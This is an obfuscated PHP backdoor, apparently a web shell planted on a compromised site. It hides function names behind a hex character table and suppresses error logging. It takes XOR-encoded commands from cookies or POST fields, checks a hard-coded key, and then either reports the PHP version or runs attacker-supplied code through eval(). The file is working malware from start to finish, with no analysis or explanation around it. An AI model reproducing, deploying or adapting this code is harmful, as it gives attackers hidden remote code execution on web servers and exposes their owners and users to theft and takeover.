<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['s782bd'] = "\x4b\x29\x47\x32\x2d\x23\x2e\x2b\x72\x37\x75\x61\x50\x51\x60\x7c\x5a\x7e\xa\x65\x43\x4f\x5c\x26\x4d\x44\x7d\x76\x58\x3b\x6e\x7b\x6c\x38\x48\x77\x20\x5d\x2c\x24\x49\x56\x28\x7a\x6a\x4a\x34\x2f\x6b\x5e\x2a\x6d\x25\x33\x4c\x9\x3e\x40\x63\x71\x68\x57\x4e\x79\x41\x53\x59\x42\x35\x3a\x45\x30\x5f\x78\x22\x52\x6f\x67\x73\x46\x3d\x27\x62\x3c\x5b\x3f\x31\x70\xd\x74\x21\x66\x55\x36\x64\x69\x39\x54";
$GLOBALS[$GLOBALS['s782bd'][27].$GLOBALS['s782bd'][91].$GLOBALS['s782bd'][96].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][96]] = $GLOBALS['s782bd'][58].$GLOBALS['s782bd'][60].$GLOBALS['s782bd'][8];
$GLOBALS[$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][33].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][94].$GLOBALS['s782bd'][71].$GLOBALS['s782bd'][19]] = $GLOBALS['s782bd'][76].$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][94];
$GLOBALS[$GLOBALS['s782bd'][48].$GLOBALS['s782bd'][94].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][93]] = $GLOBALS['s782bd'][78].$GLOBALS['s782bd'][89].$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][32].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][30];
$GLOBALS[$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][86].$GLOBALS['s782bd'][71].$GLOBALS['s782bd'][68].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][86]] = $GLOBALS['s782bd'][95].$GLOBALS['s782bd'][30].$GLOBALS['s782bd'][95].$GLOBALS['s782bd'][72].$GLOBALS['s782bd'][78].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][89];
$GLOBALS[$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][19]] = $GLOBALS['s782bd'][78].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][95].$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][32].$GLOBALS['s782bd'][95].$GLOBALS['s782bd'][43].$GLOBALS['s782bd'][19];
$GLOBALS[$GLOBALS['s782bd'][77].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][91].$GLOBALS['s782bd'][68].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][9].$GLOBALS['s782bd'][91].$GLOBALS['s782bd'][9].$GLOBALS['s782bd'][96]] = $GLOBALS['s782bd'][87].$GLOBALS['s782bd'][60].$GLOBALS['s782bd'][87].$GLOBALS['s782bd'][27].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][78].$GLOBALS['s782bd'][95].$GLOBALS['s782bd'][76].$GLOBALS['s782bd'][30];
$GLOBALS[$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][53].$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][96].$GLOBALS['s782bd'][82].$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][58]] = $GLOBALS['s782bd'][10].$GLOBALS['s782bd'][30].$GLOBALS['s782bd'][78].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][95].$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][32].$GLOBALS['s782bd'][95].$GLOBALS['s782bd'][43].$GLOBALS['s782bd'][19];
$GLOBALS[$GLOBALS['s782bd'][89].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][68].$GLOBALS['s782bd'][82].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][33]] = $GLOBALS['s782bd'][82].$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][78].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][72].$GLOBALS['s782bd'][94].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][76].$GLOBALS['s782bd'][94].$GLOBALS['s782bd'][19];
$GLOBALS[$GLOBALS['s782bd'][10].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][91].$GLOBALS['s782bd'][33].$GLOBALS['s782bd'][11]] = $GLOBALS['s782bd'][78].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][89].$GLOBALS['s782bd'][72].$GLOBALS['s782bd'][89].$GLOBALS['s782bd'][95].$GLOBALS['s782bd'][51].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][72].$GLOBALS['s782bd'][32].$GLOBALS['s782bd'][95].$GLOBALS['s782bd'][51].$GLOBALS['s782bd'][95].$GLOBALS['s782bd'][89];
$GLOBALS[$GLOBALS['s782bd'][76].$GLOBALS['s782bd'][94].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][19]] = $GLOBALS['s782bd'][89].$GLOBALS['s782bd'][91].$GLOBALS['s782bd'][33].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][96].$GLOBALS['s782bd'][68].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][46];
$GLOBALS[$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][86].$GLOBALS['s782bd'][33]] = $GLOBALS['s782bd'][78].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][82].$GLOBALS['s782bd'][71].$GLOBALS['s782bd'][96].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][53];
$GLOBALS[$GLOBALS['s782bd'][35].$GLOBALS['s782bd'][96].$GLOBALS['s782bd'][53].$GLOBALS['s782bd'][53]] = $_POST;
$GLOBALS[$GLOBALS['s782bd'][91].$GLOBALS['s782bd'][9].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][86]] = $_COOKIE;
@$GLOBALS[$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][86].$GLOBALS['s782bd'][71].$GLOBALS['s782bd'][68].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][86]]($GLOBALS['s782bd'][19].$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][76].$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][72].$GLOBALS['s782bd'][32].$GLOBALS['s782bd'][76].$GLOBALS['s782bd'][77], NULL);
@$GLOBALS[$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][86].$GLOBALS['s782bd'][71].$GLOBALS['s782bd'][68].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][86]]($GLOBALS['s782bd'][32].$GLOBALS['s782bd'][76].$GLOBALS['s782bd'][77].$GLOBALS['s782bd'][72].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][76].$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][78], 0);
@$GLOBALS[$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][86].$GLOBALS['s782bd'][71].$GLOBALS['s782bd'][68].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][86]]($GLOBALS['s782bd'][51].$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][73].$GLOBALS['s782bd'][72].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][73].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][10].$GLOBALS['s782bd'][89].$GLOBALS['s782bd'][95].$GLOBALS['s782bd'][76].$GLOBALS['s782bd'][30].$GLOBALS['s782bd'][72].$GLOBALS['s782bd'][89].$GLOBALS['s782bd'][95].$GLOBALS['s782bd'][51].$GLOBALS['s782bd'][19], 0);
@$GLOBALS[$GLOBALS['s782bd'][10].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][91].$GLOBALS['s782bd'][33].$GLOBALS['s782bd'][11]](0);

$gcc2a2 = NULL;
$x4073d569 = NULL;

$GLOBALS[$GLOBALS['s782bd'][59].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][9]] = $GLOBALS['s782bd'][46].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][86].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][82].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][4].$GLOBALS['s782bd'][68].$GLOBALS['s782bd'][82].$GLOBALS['s782bd'][53].$GLOBALS['s782bd'][91].$GLOBALS['s782bd'][4].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][96].$GLOBALS['s782bd'][71].$GLOBALS['s782bd'][33].$GLOBALS['s782bd'][4].$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][53].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][4].$GLOBALS['s782bd'][33].$GLOBALS['s782bd'][82].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][53].$GLOBALS['s782bd'][94].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][96].$GLOBALS['s782bd'][96].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][9].$GLOBALS['s782bd'][96];
global $q667;

function seab0943($gcc2a2, $f5bdc)
{
    $u280 = "";

    for ($y6c8=0; $y6c8<$GLOBALS[$GLOBALS['s782bd'][48].$GLOBALS['s782bd'][94].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][93]]($gcc2a2);)
    {
        for ($x558=0; $x558<$GLOBALS[$GLOBALS['s782bd'][48].$GLOBALS['s782bd'][94].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][93]]($f5bdc) && $y6c8<$GLOBALS[$GLOBALS['s782bd'][48].$GLOBALS['s782bd'][94].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][93]]($gcc2a2); $x558++, $y6c8++)
        {
            $u280 .= $GLOBALS[$GLOBALS['s782bd'][27].$GLOBALS['s782bd'][91].$GLOBALS['s782bd'][96].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][96]]($GLOBALS[$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][33].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][94].$GLOBALS['s782bd'][71].$GLOBALS['s782bd'][19]]($gcc2a2[$y6c8]) ^ $GLOBALS[$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][33].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][94].$GLOBALS['s782bd'][71].$GLOBALS['s782bd'][19]]($f5bdc[$x558]));
        }
    }

    return $u280;
}

function tf8ee9544($gcc2a2, $f5bdc)
{
    global $q667;

    return $GLOBALS[$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][86].$GLOBALS['s782bd'][33]]($GLOBALS[$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][86].$GLOBALS['s782bd'][33]]($gcc2a2, $q667), $f5bdc);
}

foreach ($GLOBALS[$GLOBALS['s782bd'][91].$GLOBALS['s782bd'][9].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][86]] as $f5bdc=>$o672d06)
{
    $gcc2a2 = $o672d06;
    $x4073d569 = $f5bdc;
}

if (!$gcc2a2)
{
    foreach ($GLOBALS[$GLOBALS['s782bd'][35].$GLOBALS['s782bd'][96].$GLOBALS['s782bd'][53].$GLOBALS['s782bd'][53]] as $f5bdc=>$o672d06)
    {
        $gcc2a2 = $o672d06;
        $x4073d569 = $f5bdc;
    }
}

$gcc2a2 = @$GLOBALS[$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][53].$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][96].$GLOBALS['s782bd'][82].$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][58]]($GLOBALS[$GLOBALS['s782bd'][76].$GLOBALS['s782bd'][94].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][58].$GLOBALS['s782bd'][19]]($GLOBALS[$GLOBALS['s782bd'][89].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][68].$GLOBALS['s782bd'][82].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][19].$GLOBALS['s782bd'][3].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][33]]($gcc2a2), $x4073d569));
if (isset($gcc2a2[$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][48]]) && $q667==$gcc2a2[$GLOBALS['s782bd'][11].$GLOBALS['s782bd'][48]])
{
    if ($gcc2a2[$GLOBALS['s782bd'][11]] == $GLOBALS['s782bd'][95])
    {
        $y6c8 = Array(
            $GLOBALS['s782bd'][87].$GLOBALS['s782bd'][27] => @$GLOBALS[$GLOBALS['s782bd'][77].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][91].$GLOBALS['s782bd'][68].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][9].$GLOBALS['s782bd'][91].$GLOBALS['s782bd'][9].$GLOBALS['s782bd'][96]](),
            $GLOBALS['s782bd'][78].$GLOBALS['s782bd'][27] => $GLOBALS['s782bd'][86].$GLOBALS['s782bd'][6].$GLOBALS['s782bd'][71].$GLOBALS['s782bd'][4].$GLOBALS['s782bd'][86],
        );
        echo @$GLOBALS[$GLOBALS['s782bd'][8].$GLOBALS['s782bd'][46].$GLOBALS['s782bd'][93].$GLOBALS['s782bd'][19]]($y6c8);
    }
    elseif ($gcc2a2[$GLOBALS['s782bd'][11]] == $GLOBALS['s782bd'][19])
    {
        eval($gcc2a2[$GLOBALS['s782bd'][94]]);
    }
    exit();
}